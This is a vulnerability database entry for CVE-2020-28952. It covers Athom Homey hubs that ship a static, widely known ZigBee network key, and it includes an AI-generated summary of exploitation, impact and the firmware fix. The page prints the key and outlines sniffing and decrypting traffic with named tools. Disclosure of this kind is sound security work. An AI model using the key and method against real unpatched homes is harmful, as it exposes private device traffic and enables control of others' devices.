CVE-2020-28952
Description
An issue was discovered on Athom Homey and Homey Pro devices before 5.0.0. ZigBee hub devices should generate a unique Standard Network Key that is then exchanged with all enrolled devices so that all inter-device communication is encrypted. However, the cited Athom products use another widely known key that is designed for testing purposes: "01030507090b0d0f00020406080a0c0d" (the decimal equivalent of 1 3 5 7 9 11 13 15 0 2 4 6 8 10 12 13), which is human generated and static across all issued devices.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Athom Homey and Homey Pro devices before 5.0.0 use a static, well-known ZigBee network key, allowing attackers to decrypt all inter-device communication.
Vulnerability
Athom Homey and Homey Pro devices prior to version 5.0.0 use a static, well-known ZigBee Standard Network Key for encrypting inter-device communication. The key is the hexadecimal string 01030507090b0d0f00020406080a0c0d, which is human-generated and identical across all devices [2]. This key is intended only for testing purposes but was deployed in production firmware.
Exploitation
An attacker within ZigBee radio range can capture encrypted network traffic using a ZigBee sniffer (e.g., CC25xx receivers and the KillerBee suite) [2]. Because the encryption key is static and publicly known, the attacker can decrypt all captured ZigBee frames without any authentication or prior access to the network. No user interaction is required.
Impact
Successful decryption reveals all ZigBee communication between the hub and enrolled devices, including sensor data, device commands, and configuration messages. This information disclosure could enable further attacks such as replay of commands or unauthorized control of smart home devices. The compromise affects the confidentiality of the entire ZigBee network.
Mitigation
Athom released firmware version 5.0.0 to address this issue. Users should update their Homey or Homey Pro devices to the latest firmware. No workaround exists for unpatched devices. The vulnerability is not listed on CISA's Known Exploited Vulnerabilities catalog as of the publication date.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
3- Athom/Homey Pro devicesdescription
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
3- developer.athom.com/firmwaremitrex_refsource_MISC
- homey.app/en-us/mitrex_refsource_MISC
- yougottahackthat.com/blog/1260/athom-homey-security-static-and-well-known-keys-cve-2020-28952mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.